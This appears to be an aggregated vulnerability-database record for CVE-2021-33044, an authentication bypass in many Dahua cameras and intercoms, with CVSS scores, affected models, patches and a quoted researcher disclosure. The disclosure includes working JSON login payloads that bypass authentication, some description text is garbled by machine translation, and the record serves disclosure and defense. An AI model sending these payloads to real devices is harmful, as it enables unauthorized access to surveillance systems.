ID

VAR-202109-1875


CVE

CVE-2021-33044


TITLE

plural  Dahua  Product certification vulnerabilities

Trust: 0.8

sources: JVNDB: JVNDB-2021-012422

DESCRIPTION

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX] Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure -=[NetKeyboard Vulnerability]=- CVE-2021-33044 Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 } -=[Loopback Vulnerability]=- CVE-2021-33045 Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication. Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>} [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 } Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 } [ETX]

Trust: 3.51

sources: NVD: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // PACKETSTORM: 164423

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 0.6

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816

AFFECTED PRODUCTS

vendor:dahuamodel:ipc-hx5xxxscope: - version: -

Trust: 1.6

vendor:dahuamodel:ipc-hx3xxxscope: - version: -

Trust: 1.6

vendor:dahuamodel:ipc-hum7xxxscope: - version: -

Trust: 1.6

vendor:dahuasecuritymodel:ipc-hx5xxxscope:ltversion:2.820.0000000.18.r.210705

Trust: 1.0

vendor:dahuasecuritymodel:tpc-sd2221scope:lteversion:2.630.0000000.7.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:vto-75x95xscope:ltversion:4.300.0000003.0.r.210714

Trust: 1.0

vendor:dahuasecuritymodel:tpc-pt8x21bscope:ltversion:2.630.0000000.10.r.210701

Trust: 1.0

vendor:dahuasecuritymodel:sd52cscope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf5x01scope:ltversion:2.630.0000000.12.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hum7xxxscope:ltversion:2.820.0000000.5.r.210705

Trust: 1.0

vendor:dahuasecuritymodel:sd41scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:vth-542xhscope:ltversion:4.500.0000002.0.r.210715

Trust: 1.0

vendor:dahuasecuritymodel:tpc-sd8x21scope:ltversion:2.630.0000000.9.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:sd22scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:sd6alscope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hx3xxxscope:ltversion:2.800.0000000.29.r.210630

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf2221scope:ltversion:2.630.0000000.10.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:sd50scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf5x21scope:ltversion:2.630.0000000.8.r.210630

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf1241scope:ltversion:2.630.0000000.6.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:sd1a1scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:vto-65xxxscope:ltversion:4.300.0000004.0.r.210715

Trust: 1.0

vendor:dahuamodel:sd22scope: - version: -

Trust: 0.8

vendor:dahuamodel:tpc-bf1241scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd6alscope: - version: -

Trust: 0.8

vendor:dahuamodel:sd41scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd50scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd1a1scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd52cscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd1a1scope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx5 xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-sd2221scope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-bf5xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd52cscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx1xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd6alscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd50scope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx8xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-bf1241scope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-sd8x21scope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx2xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd49scope: - version: -

Trust: 0.8

vendor:dahuamodel:dhi-asi7213y-v3-t1scope: - version: -

Trust: 0.8

vendor:dahuamodel:vth542xhscope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-pt8x21bscope: - version: -

Trust: 0.8

vendor:dahuamodel:vto75x95xscope:eqversion:build time but 2021 year 6 versions older than month

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd22scope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-bf2221scope: - version: -

Trust: 0.8

vendor:dahuamodel:vto65xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipcscope: - version: -

Trust: 0.6

vendor:dahuamodel:ipc-hx3xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:hx5xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:hum7xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:vto75x95x versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:vto65xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:vth542xh versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:ptz dome camera sd1a1 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd22 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd49 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd50 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd52c versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd6al versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:thermal tpc-bf1241 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-bf2221 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-sd2221 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-bf5xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-sd8x21 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-pt8x21b versions which build time before junescope:eqversion:2021

Trust: 0.6

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // NVD: CVE-2021-33044

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-33044
value: CRITICAL

Trust: 1.0

NVD: CVE-2021-33044
value: CRITICAL

Trust: 0.8

IPA: JVNDB-2024-000007
value: HIGH

Trust: 0.8

CNVD: CNVD-2021-103421
value: HIGH

Trust: 0.6

CNVD: CNVD-2021-70816
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202109-1080
value: CRITICAL

Trust: 0.6

nvd@nist.gov: CVE-2021-33044
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

IPA: JVNDB-2024-000007
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2021-103421
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2021-70816
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 4.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2021-33044
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2021-33044
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

IPA: JVNDB-2024-000007
baseSeverity: HIGH
baseScore: 8.1
vectorString: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: HIGH
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // CNNVD: CNNVD-202109-1080 // NVD: CVE-2021-33044

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.0

problemtype:Inappropriate authentication (CWE-287) [NVD evaluation ]

Trust: 0.8

problemtype:Inappropriate authentication (CWE-287) [IPA evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // NVD: CVE-2021-33044

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202109-1080

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-202109-1080

PATCH

title:Dahua Technology : DHCC-SA-202106-001url:https://www.dahuasecurity.com/support/cybersecurity/details/957

Trust: 0.8

title:DHCC-SA-202106-001url:https://www.dahuasecurity.com/aboutUs/trustedCenter/details/582

Trust: 0.8

title:Patch for Dahua IPC authentication bypass vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/311536

Trust: 0.6

title:Patch for Identity authentication bypass vulnerabilities in some Dahua productsurl:https://www.cnvd.org.cn/patchInfo/show/290751

Trust: 0.6

title:Dahua IPC Remediation measures for authorization problem vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=164675

Trust: 0.6

title:PoCurl:https://github.com/mcw0/PoC

Trust: 0.1

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // VULMON: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // CNNVD: CNNVD-202109-1080

EXTERNAL IDS

db:NVDid:CVE-2021-33044

Trust: 6.2

db:PACKETSTORMid:164423

Trust: 1.7

db:JVNDBid:JVNDB-2021-012422

Trust: 0.8

db:JVNid:JVN83655695

Trust: 0.8

db:JVNDBid:JVNDB-2024-000007

Trust: 0.8

db:CNVDid:CNVD-2021-103421

Trust: 0.6

db:CNVDid:CNVD-2021-70816

Trust: 0.6

db:CNNVDid:CNNVD-202109-1080

Trust: 0.6

db:VULMONid:CVE-2021-33044

Trust: 0.1

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // VULMON: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // PACKETSTORM: 164423 // CNNVD: CNNVD-202109-1080 // NVD: CVE-2021-33044

REFERENCES

url:http://seclists.org/fulldisclosure/2021/oct/13

Trust: 2.4

url:https://nvd.nist.gov/vuln/detail/cve-2021-33044

Trust: 2.3

url:https://www.dahuasecurity.com/support/cybersecurity/details/957

Trust: 2.3

url:http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html

Trust: 2.2

url:https://jvn.jp/jp/jvn83655695/index.html

Trust: 0.8

url:https://github.com/mcw0/poc

Trust: 0.1

url:https://github.com/mcw0/dahuaconsole

Trust: 0.1

url:https://www.dahuasecurity.com/support/downloadcenter/firmware

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33045

Trust: 0.1

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // VULMON: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // PACKETSTORM: 164423 // CNNVD: CNNVD-202109-1080 // NVD: CVE-2021-33044

CREDITS

bashis

Trust: 0.1

sources: PACKETSTORM: 164423

SOURCES

db:CNVDid:CNVD-2021-103421
db:CNVDid:CNVD-2021-70816
db:VULMONid:CVE-2021-33044
db:JVNDBid:JVNDB-2021-012422
db:JVNDBid:JVNDB-2024-000007
db:PACKETSTORMid:164423
db:CNNVDid:CNNVD-202109-1080
db:NVDid:CVE-2021-33044

LAST UPDATE DATE

2024-08-22T23:09:33.552000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2021-103421date:2022-01-18T00:00:00
db:CNVDid:CNVD-2021-70816date:2021-09-14T00:00:00
db:JVNDBid:JVNDB-2021-012422date:2022-08-31T04:47:00
db:JVNDBid:JVNDB-2024-000007date:2024-07-11T07:07:00
db:CNNVDid:CNNVD-202109-1080date:2021-10-08T00:00:00
db:NVDid:CVE-2021-33044date:2024-08-22T01:00:01.277

SOURCES RELEASE DATE

db:CNVDid:CNVD-2021-103421date:2021-12-30T00:00:00
db:CNVDid:CNVD-2021-70816date:2021-09-14T00:00:00
db:JVNDBid:JVNDB-2021-012422date:2022-08-31T00:00:00
db:JVNDBid:JVNDB-2024-000007date:2024-01-18T00:00:00
db:PACKETSTORMid:164423date:2021-10-06T15:11:51
db:CNNVDid:CNNVD-202109-1080date:2021-09-15T00:00:00
db:NVDid:CVE-2021-33044date:2021-09-15T22:15:10.497